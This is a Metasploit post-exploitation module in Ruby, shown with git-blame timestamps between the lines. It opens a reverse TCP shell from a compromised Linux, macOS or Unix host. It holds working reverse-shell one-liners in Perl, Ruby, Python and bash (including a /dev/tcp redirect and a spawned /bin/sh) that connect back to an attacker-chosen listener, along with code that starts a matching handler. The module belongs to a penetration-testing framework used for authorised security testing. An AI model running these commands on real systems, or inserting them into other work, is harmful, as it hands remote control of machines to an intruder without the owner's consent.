2011-10-18 23:31:04 +00:00
|
|
|
##
|
2017-07-24 06:26:21 -07:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 13:50:46 -05:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-10-18 23:31:04 +00:00
|
|
|
##
|
|
|
|
|
|
2016-03-08 14:02:44 +01:00
|
|
|
class MetasploitModule < Msf::Post
|
2011-10-18 23:31:04 +00:00
|
|
|
|
2023-02-08 13:47:34 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
|
super(
|
|
|
|
|
update_info(
|
|
|
|
|
info,
|
|
|
|
|
'Name' => 'Multi Manage System Remote TCP Shell Session',
|
|
|
|
|
'Description' => %q{
|
2017-09-22 13:38:06 -05:00
|
|
|
This module will create a Reverse TCP Shell on the target system
|
|
|
|
|
using the system's own scripting environments installed on the
|
2013-09-05 13:41:25 -05:00
|
|
|
target.
|
|
|
|
|
},
|
2023-02-08 13:47:34 +00:00
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Author' => ['Carlos Perez <carlos_perez[at]darkoperator.com>'],
|
|
|
|
|
'Platform' => %w[linux osx unix],
|
|
|
|
|
'SessionTypes' => [ 'meterpreter', 'shell' ]
|
|
|
|
|
)
|
|
|
|
|
)
|
2013-09-05 13:41:25 -05:00
|
|
|
register_options(
|
|
|
|
|
[
|
2017-05-02 09:32:11 -05:00
|
|
|
OptAddressLocal.new('LHOST',
|
2023-02-08 13:47:34 +00:00
|
|
|
[true, 'IP of host that will receive the connection from the payload.']),
|
2013-09-05 13:41:25 -05:00
|
|
|
OptInt.new('LPORT',
|
2023-02-08 13:47:34 +00:00
|
|
|
[false, 'Port for Payload to connect to.', 4433]),
|
2013-09-05 13:41:25 -05:00
|
|
|
OptBool.new('HANDLER',
|
2023-02-08 13:47:34 +00:00
|
|
|
[ true, 'Start an exploit/multi/handler to receive the connection', false]),
|
|
|
|
|
OptEnum.new('TYPE', [
|
|
|
|
|
true, 'Scripting environment on target to use for reverse shell',
|
|
|
|
|
'auto', ['auto', 'ruby', 'python', 'perl', 'bash']
|
|
|
|
|
])
|
|
|
|
|
]
|
|
|
|
|
)
|
2013-09-05 13:41:25 -05:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
# Run Method for when run command is issued
|
|
|
|
|
def run
|
2023-02-08 13:47:34 +00:00
|
|
|
create_multihand(datastore['LHOST'], datastore['LPORT']) if datastore['HANDLER']
|
2013-09-05 13:41:25 -05:00
|
|
|
lhost = datastore['LHOST']
|
|
|
|
|
lport = datastore['LPORT']
|
2023-02-08 13:47:34 +00:00
|
|
|
cmd = ''
|
2013-09-05 13:41:25 -05:00
|
|
|
|
|
|
|
|
begin
|
|
|
|
|
case datastore['TYPE']
|
|
|
|
|
when /auto/i
|
2023-02-08 13:47:34 +00:00
|
|
|
cmd = auto_create_session(lhost, lport)
|
2013-09-05 13:41:25 -05:00
|
|
|
when /ruby/i
|
2023-02-08 13:47:34 +00:00
|
|
|
cmd = ruby_session(lhost, lport)
|
2013-09-05 13:41:25 -05:00
|
|
|
when /python/i
|
2023-02-08 13:47:34 +00:00
|
|
|
cmd = python_session(lhost, lport)
|
2013-09-05 13:41:25 -05:00
|
|
|
when /perl/i
|
2023-02-08 13:47:34 +00:00
|
|
|
cmd = perl_session(lhost, lport)
|
2013-09-05 13:41:25 -05:00
|
|
|
when /bash/i
|
2023-02-08 13:47:34 +00:00
|
|
|
cmd = bash_session(lhost, lport)
|
2013-09-05 13:41:25 -05:00
|
|
|
end
|
2023-02-08 13:47:34 +00:00
|
|
|
rescue StandardError
|
2013-09-05 13:41:25 -05:00
|
|
|
end
|
|
|
|
|
|
2023-02-08 13:47:34 +00:00
|
|
|
if !cmd.empty?
|
2017-09-22 13:38:06 -05:00
|
|
|
print_status("Executing reverse tcp shell to #{lhost} on port #{lport}")
|
2015-06-29 11:36:28 -05:00
|
|
|
cmd_exec("(#{cmd} &)")
|
2013-09-05 13:41:25 -05:00
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
# Runs a reverse tcp shell with the scripting environment found
|
2023-02-08 13:47:34 +00:00
|
|
|
def auto_create_session(lhost, lport)
|
|
|
|
|
cmd = ''
|
2013-09-05 13:41:25 -05:00
|
|
|
|
2023-02-08 13:47:34 +00:00
|
|
|
if cmd_exec('perl -v') =~ /Larry/
|
|
|
|
|
print_status('Perl was found on target')
|
|
|
|
|
cmd = perl_session(lhost, lport)
|
2013-09-05 13:41:25 -05:00
|
|
|
vprint_status("Running #{cmd}")
|
|
|
|
|
|
2023-02-08 13:47:34 +00:00
|
|
|
elsif cmd_exec('ruby -v') =~ /revision/i
|
|
|
|
|
print_status('Ruby was found on target')
|
|
|
|
|
cmd = ruby_session(lhost, lport)
|
2013-09-05 13:41:25 -05:00
|
|
|
vprint_status("Running #{cmd}")
|
|
|
|
|
|
2023-02-08 13:47:34 +00:00
|
|
|
elsif cmd_exec('python -V') =~ /Python 2\.(\d)/
|
|
|
|
|
print_status('Python was found on target')
|
|
|
|
|
cmd = python_session(lhost, lport)
|
2013-09-05 13:41:25 -05:00
|
|
|
vprint_status("Running #{cmd}")
|
|
|
|
|
|
2023-02-08 13:47:34 +00:00
|
|
|
elsif cmd_exec('bash --version') =~ /GNU bash/
|
|
|
|
|
print_status('Bash was found on target')
|
|
|
|
|
cmd = bash_session(lhost, lport)
|
2013-09-05 13:41:25 -05:00
|
|
|
vprint_status("Running #{cmd}")
|
|
|
|
|
else
|
2023-02-08 13:47:34 +00:00
|
|
|
print_error('No scripting environment found with which to create a remote reverse TCP Shell with.')
|
2013-09-05 13:41:25 -05:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
return cmd
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
# Method for checking if a listner for a given IP and port is present
|
|
|
|
|
# will return true if a conflict exists and false if none is found
|
2023-02-08 13:47:34 +00:00
|
|
|
def check_for_listner(lhost, lport)
|
2013-09-05 13:41:25 -05:00
|
|
|
conflict = false
|
2023-02-08 13:47:34 +00:00
|
|
|
client.framework.jobs.each do |_k, j|
|
|
|
|
|
next unless j.name =~ %r{ multi/handler}
|
|
|
|
|
|
|
|
|
|
current_id = j.jid
|
|
|
|
|
current_lhost = j.ctx[0].datastore['LHOST']
|
|
|
|
|
current_lport = j.ctx[0].datastore['LPORT']
|
|
|
|
|
if (lhost == current_lhost) && (lport == current_lport.to_i)
|
|
|
|
|
print_error("Job #{current_id} is listening on IP #{current_lhost} and port #{current_lport}")
|
|
|
|
|
conflict = true
|
2013-09-05 13:41:25 -05:00
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
return conflict
|
|
|
|
|
end
|
|
|
|
|
|
2015-06-12 21:23:51 +01:00
|
|
|
# Starts a exploit/multi/handler session
|
2023-02-08 13:47:34 +00:00
|
|
|
def create_multihand(lhost, lport)
|
|
|
|
|
pay = client.framework.payloads.create('generic/shell_reverse_tcp')
|
2013-09-05 13:41:25 -05:00
|
|
|
pay.datastore['LHOST'] = lhost
|
|
|
|
|
pay.datastore['LPORT'] = lport
|
2023-02-08 13:47:34 +00:00
|
|
|
print_status('Starting exploit/multi/handler')
|
|
|
|
|
if !check_for_listner(lhost, lport)
|
2013-09-05 13:41:25 -05:00
|
|
|
# Set options for module
|
2023-02-08 13:47:34 +00:00
|
|
|
mul = client.framework.exploits.create('multi/handler')
|
2013-09-05 13:41:25 -05:00
|
|
|
mul.share_datastore(pay.datastore)
|
|
|
|
|
mul.datastore['WORKSPACE'] = client.workspace
|
2023-02-08 13:47:34 +00:00
|
|
|
mul.datastore['PAYLOAD'] = 'generic/shell_reverse_tcp'
|
2013-09-05 13:41:25 -05:00
|
|
|
mul.datastore['EXITFUNC'] = 'thread'
|
|
|
|
|
mul.datastore['ExitOnSession'] = false
|
|
|
|
|
# Validate module options
|
|
|
|
|
mul.options.validate(mul.datastore)
|
|
|
|
|
# Execute showing output
|
|
|
|
|
mul.exploit_simple(
|
2023-02-08 13:47:34 +00:00
|
|
|
'Payload' => mul.datastore['PAYLOAD'],
|
|
|
|
|
'LocalInput' => user_input,
|
|
|
|
|
'LocalOutput' => user_output,
|
|
|
|
|
'RunAsJob' => true
|
|
|
|
|
)
|
2013-09-05 13:41:25 -05:00
|
|
|
else
|
2023-02-08 13:47:34 +00:00
|
|
|
print_error('Could not start handler!')
|
|
|
|
|
print_error('A job is listening on the same Port')
|
2013-09-05 13:41:25 -05:00
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
# Perl reverse TCP Shell
|
2023-02-08 13:47:34 +00:00
|
|
|
def perl_session(lhost, lport)
|
|
|
|
|
if cmd_exec('perl -v') =~ /Larry/
|
|
|
|
|
print_status('Perl reverse shell selected')
|
|
|
|
|
cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET " \
|
|
|
|
|
"(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
|
2013-09-05 13:41:25 -05:00
|
|
|
else
|
2023-02-08 13:47:34 +00:00
|
|
|
print_error('No scripting environment found for the selected type.')
|
|
|
|
|
cmd = ''
|
2013-09-05 13:41:25 -05:00
|
|
|
end
|
|
|
|
|
return cmd
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
# Ruby reverse TCP Shell
|
2023-02-08 13:47:34 +00:00
|
|
|
def ruby_session(lhost, lport)
|
|
|
|
|
if cmd_exec('ruby -v') =~ /revision/i
|
|
|
|
|
print_status('Ruby reverse shell selected')
|
|
|
|
|
return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");" \
|
|
|
|
|
"while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'"
|
2013-09-05 13:41:25 -05:00
|
|
|
else
|
2023-02-08 13:47:34 +00:00
|
|
|
print_error('No scripting environment found for the selected type.')
|
|
|
|
|
cmd = ''
|
2013-09-05 13:41:25 -05:00
|
|
|
end
|
|
|
|
|
return cmd
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
# Python reverse TCP Shell
|
2023-02-08 13:47:34 +00:00
|
|
|
def python_session(lhost, lport)
|
|
|
|
|
if cmd_exec('python -V') =~ /Python 2\.(\d)/
|
|
|
|
|
print_status('Python reverse shell selected')
|
|
|
|
|
return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET," \
|
|
|
|
|
"socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);" \
|
|
|
|
|
"os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
|
2013-09-05 13:41:25 -05:00
|
|
|
else
|
2023-02-08 13:47:34 +00:00
|
|
|
print_error('No scripting environment found for the selected type.')
|
|
|
|
|
cmd = ''
|
2013-09-05 13:41:25 -05:00
|
|
|
end
|
|
|
|
|
return cmd
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
# Bash reverse TCP Shell
|
2023-02-08 13:47:34 +00:00
|
|
|
def bash_session(lhost, lport)
|
|
|
|
|
if cmd_exec('bash --version') =~ /GNU bash/
|
|
|
|
|
print_status('Bash reverse shell selected')
|
2013-09-05 13:41:25 -05:00
|
|
|
return "bash -c 'nohup bash -i >& /dev/tcp/#{lhost}/#{lport} 0>&1'"
|
|
|
|
|
else
|
2023-02-08 13:47:34 +00:00
|
|
|
print_error('No scripting environment found for the selected type.')
|
|
|
|
|
cmd = ''
|
2013-09-05 13:41:25 -05:00
|
|
|
end
|
|
|
|
|
return cmd
|
|
|
|
|
end
|
2012-03-18 00:07:27 -05:00
|
|
|
end
|
